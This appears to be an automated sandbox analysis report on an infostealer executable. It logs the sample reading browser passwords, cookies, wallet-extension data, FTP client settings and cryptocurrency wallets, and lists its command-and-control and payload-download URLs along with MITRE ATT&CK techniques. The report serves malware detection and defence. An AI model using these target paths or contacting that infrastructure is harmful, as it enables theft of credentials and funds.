                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: Yara matchFile source: 00000001.00000003.1436505307.0000000000864000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1436238542.0000000000859000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tTGxYWtjG5.exe PID: 424, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: tTGxYWtjG5.exe PID: 424, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix
                Tactic | Techniques (a leading number is the count shown beside that technique in the matrix)
                Reconnaissance | Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties
                Resource Development | Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet
                Initial Access | Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media
                Execution | 12 Windows Management Instrumentation | 1 PowerShell | At | Cron | Launchd | Scheduled Task
                Persistence | 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts
                Privilege Escalation | 2 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts
                Defense Evasion | 44 Virtualization/Sandbox Evasion | 2 Process Injection | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading
                Credential Access | 2 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials
                Discovery | 1 Query Registry | 851 Security Software Discovery | 44 Virtualization/Sandbox Evasion | 2 Process Discovery | 1 File and Directory Discovery | 223 System Information Discovery
                Lateral Movement | Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC
                Collection | 41 Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture
                Command and Control | 1 Encrypted Channel | 1 Ingress Tool Transfer | 3 Non-Application Layer Protocol | 114 Application Layer Protocol | Fallback Channels | Multiband Communication
                Exfiltration | Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits
                Impact | Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop

                Antivirus Detection
                Source | Detection | Scanner | Label
                tTGxYWtjG5.exe | 68% | ReversingLabs | Win32.Infostealer.Tinba
                tTGxYWtjG5.exe | 51% | Virustotal |
                tTGxYWtjG5.exe | 100% | Avira | TR/Crypt.TPM.Gen
                tTGxYWtjG5.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Domains
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                s3-w.us-east-1.amazonaws.com | 16.15.177.52 | true | false | | high
                bitbucket.org | 185.166.143.48 | true | false | | high
                observerfry.lat | 172.67.199.72 | true | false | | high
                bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
                URLs
                Name | Malicious | Antivirus Detection | Reputation
                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high
                https://observerfry.lat/api | false | | high
                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9etTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.tTGxYWtjG5.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgtTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://observerfry.lat/apiERtTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://observerfry.lat/vtTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://remote-app-switcher.stg-east.frontend.public.atl-paas.nettTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://185.215.113.16/off/def.exetTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://bbuseruploads.s3.amazonaws.com/tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://bitbucket.org/zKtTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctatTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP              Domain                        Country        ASN      ASN Name         Malicious
